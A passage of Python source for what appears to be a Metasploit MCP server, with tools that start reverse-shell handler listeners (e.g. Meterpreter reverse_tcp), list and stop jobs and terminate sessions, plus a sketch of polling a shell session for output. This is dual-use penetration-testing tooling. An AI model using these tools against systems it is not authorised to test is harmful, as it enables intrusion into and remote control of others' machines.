1406 | asyncio.to_thread(lambda: client.jobs.list),
1407 | timeout=RPC_CALL_TIMEOUT
1408 | )
1409 | if not isinstance(jobs, dict):
1410 | logger.error(f"Unexpected data type for jobs list: {type(jobs)}")
1411 | return {"status": "error", "message": f"Unexpected data type for jobs list: {type(jobs)}"}
1412 |
1413 | logger.info(f"Retrieved {len(jobs)} active jobs from MSF.")
1414 | handlers = {}
1415 | other_jobs = {}
1416 |
1417 | for job_id, job_info in jobs.items():
1418 | job_id_str = str(job_id)
1419 | job_data = { 'job_id': job_id_str, 'name': 'Unknown', 'details': job_info } # Store raw info
1420 |
1421 | is_handler = False
1422 | if isinstance(job_info, dict):
1423 | job_data['name'] = job_info.get('name', 'Unknown Job')
1424 | job_data['start_time'] = job_info.get('start_time') # Keep if useful
1425 | datastore = job_info.get('datastore', {})
1426 | if isinstance(datastore, dict): job_data['datastore'] = datastore # Include datastore
1427 |
1428 | # Primary check: module path in name or info
1429 | job_name_or_info = (job_info.get('name', '') + job_info.get('info', '')).lower()
1430 | if 'exploit/multi/handler' in job_name_or_info:
1431 | is_handler = True
1432 | # Secondary check: presence of typical handler options
1433 | elif isinstance(datastore, dict) and ('payload' in datastore or ('lhost' in datastore and 'lport' in datastore)):
1434 | is_handler = True
1435 | logger.debug(f"Job {job_id_str} identified as potential handler via datastore options.")
1436 |
1437 | if is_handler:
1438 | logger.debug(f"Categorized job {job_id_str} as a handler.")
1439 | handlers[job_id_str] = job_data
1440 | else:
1441 | logger.debug(f"Categorized job {job_id_str} as non-handler.")
1442 | other_jobs[job_id_str] = job_data
1443 |
1444 | return {
1445 | "status": "success",
1446 | "handlers": handlers,
1447 | "other_jobs": other_jobs,
1448 | "handler_count": len(handlers),
1449 | "other_job_count": len(other_jobs),
1450 | "total_job_count": len(jobs)
1451 | }
1452 |
1453 | except asyncio.TimeoutError:
1454 | error_msg = f"Timeout ({RPC_CALL_TIMEOUT}s) while listing jobs from Metasploit server. Server may be slow or unresponsive."
1455 | logger.error(error_msg)
1456 | return {"status": "error", "message": error_msg}
1457 | except MsfRpcError as e:
1458 | logger.error(f"Metasploit RPC error while listing jobs/handlers: {e}")
1459 | return {"status": "error", "message": f"Metasploit RPC error: {e}"}
1460 | except Exception as e:
1461 | logger.exception("Unexpected error listing jobs/handlers.")
1462 | return {"status": "error", "message": f"Unexpected server error listing jobs: {e}"}
1463 |
1464 | @mcp.tool()
1465 | async def start_listener(
1466 | payload_type: str,
1467 | lhost: str,
1468 | lport: int,
1469 | additional_options: Optional[Union[Dict[str, Any], str]] = None,
1470 | exit_on_session: bool = False # Option to keep listener running
1471 | ) -> Dict[str, Any]:
1472 | """
1473 | Start a new Metasploit handler (exploit/multi/handler) as a background job.
1474 |
1475 | Args:
1476 | payload_type: The payload to handle (e.g., 'windows/meterpreter/reverse_tcp').
1477 | lhost: Listener host address.
1478 | lport: Listener port (1-65535).
1479 | additional_options: Optional dict of additional payload options (e.g., {"LURI": "/path"})
1480 | or string format "LURI=/path,HandlerSSLCert=cert.pem". Prefer dict format.
1481 | exit_on_session: If True, handler exits after first session. If False (default), it keeps running.
1482 |
1483 | Returns:
1484 | Dictionary with handler status (job_id) or error details.
1485 | """
1486 | logger.info(f"Request to start listener for {payload_type} on {lhost}:{lport}. ExitOnSession: {exit_on_session}")
1487 |
1488 | if not (1 <= lport <= 65535):
1489 | return {"status": "error", "message": "Invalid LPORT. Must be between 1 and 65535."}
1490 |
1491 | # Parse additional options gracefully
1492 | try:
1493 | parsed_additional_options = _parse_options_gracefully(additional_options)
1494 | except ValueError as e:
1495 | return {"status": "error", "message": f"Invalid additional_options format: {e}"}
1496 |
1497 | # exploit/multi/handler options
1498 | module_options = {'ExitOnSession': exit_on_session}
1499 | # Payload options (passed within the payload_spec)
1500 | payload_options = parsed_additional_options
1501 | payload_options['LHOST'] = lhost
1502 | payload_options['LPORT'] = lport
1503 |
1504 | payload_spec = {"name": payload_type, "options": payload_options}
1505 |
1506 | # Use the RPC helper to start the handler job
1507 | result = await _execute_module_rpc(
1508 | module_type='exploit',
1509 | module_name='multi/handler', # Use base name for helper
1510 | module_options=module_options,
1511 | payload_spec=payload_spec
1512 | )
1513 |
1514 | # Rewrite the message for clarity; the status value is passed through unchanged
1515 | if result.get("status") == "success":
1516 | result["message"] = f"Listener for {payload_type} started as job {result.get('job_id')} on {lhost}:{lport}."
1517 | elif result.get("status") == "warning": # e.g., job started but polling failed (not expected here, but handled defensively)
1518 | result["message"] = f"Listener job {result.get('job_id')} started, but encountered issues: {result.get('message')}"
1519 | else: # Error case
1520 | result["message"] = f"Failed to start listener: {result.get('message')}"
1521 |
1522 | return result
1523 |
1524 | @mcp.tool()
1525 | async def stop_job(job_id: int) -> Dict[str, Any]:
1526 | """
1527 | Stop a running Metasploit job (handler or other) and verify that it no longer appears in the job list.
1528 | """
1529 | client = get_msf_client()
1530 | logger.info(f"Attempting to stop job {job_id}")
1531 | job_id_str = str(job_id)
1532 | job_name = "Unknown"
1533 |
1534 | try:
1535 | # Check if job exists and get name
1536 | jobs_before = await asyncio.to_thread(lambda: client.jobs.list)
1537 | if job_id_str not in jobs_before:
1538 | logger.error(f"Job {job_id} not found, cannot stop.")
1539 | return {"status": "error", "message": f"Job {job_id} not found."}
1540 | if isinstance(jobs_before.get(job_id_str), dict):
1541 | job_name = jobs_before[job_id_str].get('name', 'Unknown Job')
1542 |
1543 | # Attempt to stop the job
1544 | logger.debug(f"Calling jobs.stop({job_id_str})")
1545 | stop_result_str = await asyncio.to_thread(lambda: client.jobs.stop(job_id_str))
1546 | logger.debug(f"jobs.stop() API call returned: {stop_result_str}")
1547 |
1548 | # Verify job stopped by checking list again
1549 | await asyncio.sleep(1.0) # Give MSF time to process stop
1550 | jobs_after = await asyncio.to_thread(lambda: client.jobs.list)
1551 | job_stopped = job_id_str not in jobs_after
1552 |
1553 | if job_stopped:
1554 | logger.info(f"Successfully stopped job {job_id} ('{job_name}') - verified by disappearance")
1555 | return {
1556 | "status": "success",
1557 | "message": f"Successfully stopped job {job_id} ('{job_name}')",
1558 | "job_id": job_id,
1559 | "job_name": job_name,
1560 | "api_result": stop_result_str
1561 | }
1562 | else:
1563 | # Job didn't disappear. The API result string might give a hint, but is unreliable.
1564 | logger.error(f"Failed to stop job {job_id}. Job still present after stop attempt. API result: '{stop_result_str}'")
1565 | return {
1566 | "status": "error",
1567 | "message": f"Failed to stop job {job_id}. Job may still be running. API result: '{stop_result_str}'",
1568 | "job_id": job_id,
1569 | "job_name": job_name,
1570 | "api_result": stop_result_str
1571 | }
1572 |
1573 | except MsfRpcError as e:
1574 | logger.error(f"MsfRpcError stopping job {job_id}: {e}")
1575 | return {"status": "error", "message": f"Error stopping job {job_id}: {e}"}
1576 | except Exception as e:
1577 | logger.exception(f"Unexpected error stopping job {job_id}.")
1578 | return {"status": "error", "message": f"Unexpected server error stopping job {job_id}: {e}"}
1579 |
1580 | @mcp.tool()
1581 | async def terminate_session(session_id: int) -> Dict[str, Any]:
1582 | """
1583 | Forcefully terminate a Metasploit session using the session.stop() method.
1584 |
1585 | Args:
1586 | session_id: ID of the session to terminate.
1587 |
1588 | Returns:
1589 | Dictionary with status and result message.
1590 | """
1591 | client = get_msf_client()
1592 | session_id_str = str(session_id)
1593 | logger.info(f"Terminating session {session_id}")
1594 |
1595 | try:
1596 | # Check if session exists
1597 | current_sessions = await asyncio.to_thread(lambda: client.sessions.list)
1598 | if session_id_str not in current_sessions:
1599 | logger.error(f"Session {session_id} not found.")
1600 | return {"status": "error", "message": f"Session {session_id} not found."}
1601 |
1602 | # Get a handle to the session
1603 | session = await asyncio.to_thread(lambda: client.sessions.session(session_id_str))
1604 |
1605 | # Stop the session
1606 | await asyncio.to_thread(lambda: session.stop())
1607 |
1608 | # Verify termination
1609 | await asyncio.sleep(1.0) # Give MSF time to process termination
1610 | current_sessions_after = await asyncio.to_thread(lambda: client.sessions.list)
1611 |
1612 | if session_id_str not in current_sessions_after:
1613 | logger.info(f"Successfully terminated session {session_id}")
1614 | return {"status": "success", "message": f"Session {session_id} terminated successfully."}
1615 | else:
1616 | logger.warning(f"Session {session_id} still appears in the sessions list after termination attempt.")
1617 | return {"status": "warning", "message": f"Session {session_id} may not have been terminated properly."}
1618 |
1619 | except MsfRpcError as e:
1620 | logger.error(f"MsfRpcError terminating session {session_id}: {e}")
1621 | return {"status": "error", "message": f"Error terminating session {session_id}: {e}"}
1622 | except Exception as e:
1623 | logger.exception(f"Unexpected error terminating session {session_id}")
1624 | return {"status": "error", "message": f"Unexpected error terminating session {session_id}: {e}"}
1625 |
1626 | # --- FastAPI Application Setup ---
1627 |
1628 | app = FastAPI(
1629 | title="Metasploit MCP Server (Streamlined)",
1630 | description="Provides core Metasploit functionality via the Model Context Protocol.",
1631 | version="1.6.0", # Incremented version
1632 | )
1633 |
1634 | # Setup MCP transport (SSE for HTTP mode)
1635 | sse = SseServerTransport("/messages/")
1636 |
1637 | # Define ASGI handlers properly with Starlette's ASGIApp interface
1638 | class SseEndpoint:
1639 | async def __call__(self, scope, receive, send):
1640 | """Handle Server-Sent Events connection for MCP communication."""
1641 | client_host = scope.get('client')[0] if scope.get('client') else 'unknown'
1642 | client_port = scope.get('client')[1] if scope.get('client') else 'unknown'
1643 | logger.info(f"New SSE connection from {client_host}:{client_port}")
1644 | async with sse.connect_sse(scope, receive, send) as (read_stream, write_stream):
1645 | await mcp._mcp_server.run(read_stream, write_stream, mcp._mcp_server.create_initialization_options())
1646 | logger.info(f"SSE connection closed from {client_host}:{client_port}")
1647 |
1648 | class MessagesEndpoint:
1649 | async def __call__(self, scope, receive, send):
1650 | """Handle client POST messages for MCP communication."""
1651 | client_host = scope.get('client')[0] if scope.get('client') else 'unknown'
1652 | client_port = scope.get('client')[1] if scope.get('client') else 'unknown'
1653 | logger.info(f"Received POST message from {client_host}:{client_port}")
1654 | await sse.handle_post_message(scope, receive, send)
1655 |
1656 | # Create routes using the ASGIApp-compliant classes
1657 | mcp_router = Router([
1658 | Route("/sse", endpoint=SseEndpoint(), methods=["GET"]),
1659 | Route("/messages/", endpoint=MessagesEndpoint(), methods=["POST"]),
1660 | ])
1661 |
1662 | # Mount the MCP router to the main app
1663 | app.routes.append(Mount("/", app=mcp_router))
1664 |
1665 | @app.get("/healthz", tags=["Health"])
1666 | async def health_check():
1667 | """Check connectivity to the Metasploit RPC service."""
1668 | try:
1669 | client = get_msf_client() # Raises ConnectionError if the client is not initialized
1670 | logger.debug(f"Executing health check MSF call (core.version) with {RPC_CALL_TIMEOUT}s timeout...")
1671 | # Use a lightweight call like core.version
1672 | version_info = await asyncio.wait_for(
1673 | asyncio.to_thread(lambda: client.core.version),
1674 | timeout=RPC_CALL_TIMEOUT
1675 | )
1676 | msf_version = version_info.get('version', 'N/A') if isinstance(version_info, dict) else 'N/A'
1677 | logger.info(f"Health check successful. MSF Version: {msf_version}")
1678 | return {"status": "ok", "msf_version": msf_version}
1679 | except asyncio.TimeoutError:
1680 | error_msg = f"Health check timeout ({RPC_CALL_TIMEOUT}s) - Metasploit server is not responding"
1681 | logger.error(error_msg)
1682 | raise HTTPException(status_code=503, detail=error_msg)
1683 | except (MsfRpcError, ConnectionError) as e:
1684 | logger.error(f"Health check failed - MSF RPC connection error: {e}")
1685 | raise HTTPException(status_code=503, detail=f"Metasploit Service Unavailable: {e}")
1686 | except Exception as e:
1687 | logger.exception("Unexpected error during health check.")
1688 | raise HTTPException(status_code=500, detail=f"Internal Server Error during health check: {e}")
1689 |
1690 | # --- Server Startup Logic ---
1691 |
1692 | def find_available_port(start_port, host='127.0.0.1', max_attempts=10):
1693 | """Finds an available TCP port."""
1694 | for port in range(start_port, start_port + max_attempts):
1695 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
1696 | try:
1697 | s.bind((host, port))
1698 | logger.debug(f"Port {port} on {host} is available.")
1699 | return port
1700 | except socket.error:
1701 | logger.debug(f"Port {port} on {host} is in use, trying next.")
1702 | continue
1703 | logger.warning(f"Could not find available port in range {start_port}-{start_port+max_attempts-1} on {host}. Using default {start_port}.")
1704 | return start_port
1705 |
1706 | if __name__ == "__main__":
1707 | # Initialize MSF Client - Critical for server function
1708 | try:
1709 | initialize_msf_client()
1710 | except (ValueError, ConnectionError, RuntimeError) as e:
1711 | logger.critical(f"CRITICAL: Failed to initialize Metasploit client on startup: {e}. Server cannot function.")
1712 | sys.exit(1) # Exit if MSF connection fails at start
1713 |
1714 | # --- Setup argument parser for transport mode and server configuration ---
1715 | import argparse
1716 |
1717 | parser = argparse.ArgumentParser(description='Run Streamlined Metasploit MCP Server')
1718 | parser.add_argument(
1719 | '--transport',
1720 | choices=['http', 'stdio'],
1721 | default='http',
1722 | help='MCP transport mode to use (http=SSE, stdio=direct pipe)'
1723 | )
1724 | parser.add_argument('--host', default='127.0.0.1', help='Host to bind the HTTP server to (default: 127.0.0.1)')
1725 | parser.add_argument('--port', type=int, default=None, help='Port to listen on (default: find available from 8085)')
1726 | parser.add_argument('--reload', action='store_true', help='Enable auto-reload (for development)')
1727 | parser.add_argument('--find-port', action='store_true', help='Force finding an available port starting from --port or 8085')
1728 | args = parser.parse_args()
1729 |
1730 | if args.transport == 'stdio':
1731 | logger.info("Starting MCP server in STDIO transport mode.")
1732 | try:
1733 | mcp.run(transport="stdio")
1734 | except Exception: # logger.exception below records the traceback
1735 | logger.exception("Error during MCP stdio run loop.")
1736 | sys.exit(1)
1737 | logger.info("MCP stdio server finished.")
1738 | else: # HTTP/SSE mode (default)
1739 | logger.info("Starting MCP server in HTTP/SSE transport mode.")
1740 |
1741 | # Check port availability
1742 | check_host = args.host if args.host != '0.0.0.0' else '127.0.0.1'
1743 | selected_port = args.port
1744 | if selected_port is None or args.find_port:
1745 | start_port = selected_port if selected_port is not None else 8085
1746 | selected_port = find_available_port(start_port, host=check_host)
1747 |
1748 | logger.info(f"Starting Uvicorn HTTP server on http://{args.host}:{selected_port}")
1749 | logger.info("MCP SSE Endpoint: /sse")
1750 | logger.info(f"API Docs available at http://{args.host}:{selected_port}/docs")
1751 | logger.info(f"Payload Save Directory: {PAYLOAD_SAVE_DIR}")
1752 | logger.info(f"Auto-reload: {'Enabled' if args.reload else 'Disabled'}")
1753 |
1754 | uvicorn.run(
1755 | "__main__:app",
1756 | host=args.host,
1757 | port=selected_port,
1758 | reload=args.reload,
1759 | log_level="info"
1760 | )
1761 |
```
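
The shell branch of the session command tool above polls `session.read()` until one of three things happens: a prompt appears at the end of the buffer, no data arrives for an inactivity window, or the overall deadline passes. The following is a minimal, self-contained sketch of that loop, not the server's actual code. `FakeSession`, `read_until_prompt`, `PROMPT_RE`, and `INACTIVITY_TIMEOUT` are hypothetical names introduced for illustration; the real `SHELL_PROMPT_RE` and `SESSION_READ_INACTIVITY_TIMEOUT` are defined elsewhere in `MetasploitMCP.py` and their values are not assumed here.

```python
import asyncio
import re

# Hypothetical stand-ins for the constants used by the real server.
PROMPT_RE = re.compile(r"[$#>]\s*$")
INACTIVITY_TIMEOUT = 0.3  # seconds without data before assuming completion


class FakeSession:
    """Illustrative session: read() yields queued chunks, then empty strings."""

    def __init__(self, chunks):
        self._chunks = list(chunks)
        self.written = []

    def write(self, data):
        self.written.append(data)

    def read(self):
        return self._chunks.pop(0) if self._chunks else ""


async def read_until_prompt(session, command, timeout_seconds=2.0, read_interval=0.05):
    """Send a command, then poll until a prompt, inactivity, or the deadline."""
    loop = asyncio.get_running_loop()
    # Blocking calls go through a worker thread so the event loop stays free.
    await asyncio.to_thread(session.write, command + "\n")
    buffer = ""
    start = last_data = loop.time()
    while True:
        now = loop.time()
        if now - start > timeout_seconds:
            return {"status": "timeout", "output": buffer}
        chunk = await asyncio.to_thread(session.read)
        if chunk:
            buffer += chunk
            last_data = now
            # A prompt at the end of the buffer means the command finished.
            if PROMPT_RE.search(buffer):
                return {"status": "success", "output": buffer}
        elif now - last_data > INACTIVITY_TIMEOUT:
            # No prompt seen, but the shell has gone quiet: assume completion.
            return {"status": "success", "output": buffer}
        await asyncio.sleep(read_interval)


with_prompt = asyncio.run(read_until_prompt(FakeSession(["uid=0(root)\n", "$ "]), "id"))
no_prompt = asyncio.run(read_until_prompt(FakeSession(["partial output"]), "id"))
```

In this sketch the first call returns as soon as the prompt arrives, while the second returns only after the inactivity window elapses. The inactivity fallback matters because many raw shells never print a recognizable prompt, so waiting for one alone would turn every such command into a timeout.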